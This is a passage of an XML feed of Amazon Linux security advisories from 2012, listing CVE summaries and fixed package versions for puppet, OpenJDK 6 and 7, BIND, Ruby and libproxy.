</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3864" title="" id="CVE-2012-3864" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3865" title="" id="CVE-2012-3865" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3866" title="" id="CVE-2012-3866" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3867" title="" id="CVE-2012-3867" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet-server" version="2.7.18" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.7.18-1.9.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.7.18" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.7.18-1.9.amzn1.i686.rpm</filename></package><package name="puppet" version="2.7.18" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.7.18-1.9.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.7.18" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.7.18-1.9.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.7.18" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.7.18-1.9.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.7.18" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.7.18-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-136</id><title>Amazon Linux - ALAS-2012-136: important priority package update for java-1.6.0-openjdk</title><issued date="2012-10-23 10:38:00" /><updated date="2014-09-14 17:13:00" /><severity>important</severity><description>Package updates are 
available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5086:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Multiple improper permission check issues were discovered in the Beans, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
Multiple improper permission check issues were discovered in the Beans, Libraries, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
865428:
CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917)
CVE-2012-5085:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote authenticated users to have an unspecified impact via unknown vectors related to Networking. NOTE: the Oracle CPU states that this issue has a 0.0 CVSS score. If so, then this is not a vulnerability and this issue should not be included in CVE.
This update disables Gopher protocol support in the java.net package by default. Gopher support can be enabled by setting the newly introduced property, "jdk.net.registerGopherProtocol", to true.
865541:
CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567)
CVE-2012-5081:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect availability, related to JSSE.
It was discovered that the Java Secure Socket Extension (JSSE) SSL/TLS implementation did not properly handle handshake records containing an overly large data length value. An unauthenticated, remote attacker could possibly use this flaw to cause an SSL/TLS server to terminate with an exception.
865370:
CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)
CVE-2012-5079:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries.
It was discovered that java.util.ServiceLoader could create an instance of an incompatible class while performing provider lookup. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
865568:
CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
CVE-2012-5077:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Security.
It was discovered that the SecureRandom class did not properly protect against the creation of multiple seeders. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865354:
CVE-2012-5077 OpenJDK: SecureRandom multiple seeders information disclosure (Security, 7167656)
CVE-2012-5075:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, and 5.0 Update 36 and earlier allows remote attackers to affect confidentiality, related to JMX.
It was discovered that the JMX component in OpenJDK could perform certain actions in an insecure manner. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865363:
CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)
CVE-2012-5068:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Multiple improper permission check issues were discovered in the Scripting, JMX, Concurrency, Libraries, and Security components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
865348:
CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)
CVE-2012-4416:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Hotspot.
A bug in the Java HotSpot Virtual Machine optimization code could cause it to not perform array initialization in certain cases. An untrusted Java application or applet could use this flaw to disclose portions of the virtual machine's memory.
856124:
CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606)
CVE-2012-3216:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
It was discovered that the java.io.FilePermission class exposed the hash code of the canonicalized path name. An untrusted Java application or applet could possibly use this flaw to determine certain system paths, such as the current working directory.
865346:
CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3216" title="" id="CVE-2012-3216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4416" title="" id="CVE-2012-4416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5068" title="" id="CVE-2012-5068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5075" title="" id="CVE-2012-5075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5077" title="" id="CVE-2012-5077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5079" title="" id="CVE-2012-5079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5081" title="" id="CVE-2012-5081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5085" title="" id="CVE-2012-5085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5086" title="" id="CVE-2012-5086" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1384.html" title="" id="RHSA-2012:1384" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" 
release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-53.1.11.5.47.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="53.1.11.5.47.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-53.1.11.5.47.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2012-137</id><title>Amazon Linux - ALAS-2012-137: important priority package update for java-1.7.0-openjdk</title><issued date="2012-10-23 10:38:00" /><updated date="2014-09-14 17:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-5086:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Beans.
Multiple improper permission check issues were discovered in the Beans, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
Multiple improper permission check issues were discovered in the Beans, Libraries, Swing, and JMX components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
865428:
CVE-2012-5086 OpenJDK: XMLDecoder sandbox restriction bypass (Beans, 7195917)
CVE-2012-5085:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote authenticated users to have an unspecified impact via unknown vectors related to Networking. NOTE: the Oracle CPU states that this issue has a 0.0 CVSS score. If so, then this is not a vulnerability and this issue should not be included in CVE.
This update disables Gopher protocol support in the java.net package by default. Gopher support can be enabled by setting the newly introduced property, "jdk.net.registerGopherProtocol", to true.
865541:
CVE-2012-5085 OpenJDK: disable Gopher support by default (Gopher, 7189567)
CVE-2012-5081:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect availability, related to JSSE.
It was discovered that the Java Secure Socket Extension (JSSE) SSL/TLS implementation did not properly handle handshake records containing an overly large data length value. An unauthenticated, remote attacker could possibly use this flaw to cause an SSL/TLS server to terminate with an exception.
865370:
CVE-2012-5081 OpenJDK: JSSE denial of service (JSSE, 7186286)
CVE-2012-5079:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect integrity via unknown vectors related to Libraries.
It was discovered that java.util.ServiceLoader could create an instance of an incompatible class while performing provider lookup. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
865568:
CVE-2012-5079 OpenJDK: ServiceLoader reject not subtype classes without instantiating (Libraries, 7195919)
CVE-2012-5077:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Security.
It was discovered that the SecureRandom class did not properly protect against the creation of multiple seeders. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865354:
CVE-2012-5077 OpenJDK: SecureRandom multiple seeders information disclosure (Security, 7167656)
CVE-2012-5075:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, and 5.0 Update 36 and earlier allows remote attackers to affect confidentiality, related to JMX.
It was discovered that the JMX component in OpenJDK could perform certain actions in an insecure manner. An untrusted Java application or applet could possibly use this flaw to disclose sensitive information.
865363:
CVE-2012-5075 OpenJDK: RMIConnectionImpl information disclosure (JMX, 7169888)
CVE-2012-5068:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Libraries.
Multiple improper permission check issues were discovered in the Scripting, JMX, Concurrency, Libraries, and Security components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
865348:
CVE-2012-5068 OpenJDK: RhinoScriptEngine security bypass (Scripting, 7143535)
CVE-2012-4416:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, and 6 Update 35 and earlier, allows remote attackers to affect confidentiality and integrity via unknown vectors related to Hotspot.
A bug in the Java HotSpot Virtual Machine optimization code could cause it to not perform array initialization in certain cases. An untrusted Java application or applet could use this flaw to disclose portions of the virtual machine's memory.
856124:
CVE-2012-4416 OpenJDK: uninitialized Array JVM memory disclosure (Hotspot, 7198606)
CVE-2012-3216:
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect confidentiality via unknown vectors related to Libraries.
It was discovered that the java.io.FilePermission class exposed the hash code of the canonicalized path name. An untrusted Java application or applet could possibly use this flaw to determine certain system paths, such as the current working directory.
865346:
CVE-2012-3216 OpenJDK: java.io.FilePermission information leak (Libraries, 6631398)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3216" title="" id="CVE-2012-3216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4416" title="" id="CVE-2012-4416" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5068" title="" id="CVE-2012-5068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5075" title="" id="CVE-2012-5075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5077" title="" id="CVE-2012-5077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5079" title="" id="CVE-2012-5079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5081" title="" id="CVE-2012-5081" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5085" title="" id="CVE-2012-5085" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5086" title="" id="CVE-2012-5086" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1384.html" title="" id="RHSA-2012:1384" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.3.13.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.9-2.3.3.13.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.9" release="2.3.3.13.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.3.13.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-138</id><title>Amazon Linux - ALAS-2012-138: important priority package update for bind</title><issued date="2012-10-23 10:39:00" /><updated date="2014-09-14 17:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2012-5166:
ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
A flaw was found in the way BIND handled certain combinations of resource records. A remote attacker could use this flaw to cause a recursive resolver, or an authoritative server in certain configurations, to lock up.
864273:
CVE-2012-5166 bind: Specially crafted DNS data can cause a lockup in named
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5166" title="" id="CVE-2012-5166" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1363.html" title="" id="RHSA-2012:1363" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="bind" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.10.rc1.25.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" 
release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.10.rc1.25.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.10.rc1.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-139</id><title>Amazon Linux - ALAS-2012-139: medium priority package update for ruby</title><issued date="2012-10-23 10:43:00" /><updated date="2014-09-14 17:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4466:
862614:
CVE-2012-4466 ruby: safe level bypass via name_err_mesg_to_str()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4466" title="" id="CVE-2012-4466" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ruby-libs" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-ri" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.371-1.20.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-ri" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-irb" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.371-1.20.amzn1.noarch.rpm</filename></package><package name="ruby-libs" version="1.8.7.371" release="1.20.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.371-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.371" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.371-1.20.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-140</id><title>Amazon Linux - ALAS-2012-140: medium priority package update for libproxy</title><issued date="2012-11-20 06:25:00" /><updated date="2014-09-14 17:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-4505:
Heap-based buffer overflow in the px_pac_reload function in lib/pac.c in libproxy 0.2.x and 0.3.x allows remote servers to have an unspecified impact via a crafted Content-Length size in an HTTP response header for a proxy.pac file request, a different vulnerability than CVE-2012-4504.
A buffer overflow flaw was found in the way libproxy handled the downloading of proxy auto-configuration (PAC) files. A malicious server hosting a PAC file or a man-in-the-middle attacker could use this flaw to cause an application using libproxy to crash or, possibly, execute arbitrary code, if the proxy settings obtained by libproxy (from the environment or the desktop environment settings) instructed the use of a PAC proxy configuration.
864612:
CVE-2012-4505 libproxy: PAC handling insufficient content length check leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4505" title="" id="CVE-2012-4505" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1461.html" title="" id="RHSA-2012:1461" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libproxy-bin" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-bin-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-devel" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-devel-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-python" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-python-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-debuginfo" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-debuginfo-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy" version="0.3.0" release="3.7.amzn1" epoch="0" arch="i686"><filename>Packages/libproxy-0.3.0-3.7.amzn1.i686.rpm</filename></package><package name="libproxy-python" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-python-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy-bin" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-bin-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy-devel" version="0.3.0" release="3.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libproxy-devel-0.3.0-3.7.amzn1.x86_64.rpm</filename></package><package name="libproxy-debuginfo" version="0.3.0" release="3.7.amzn1" epoch="0" 
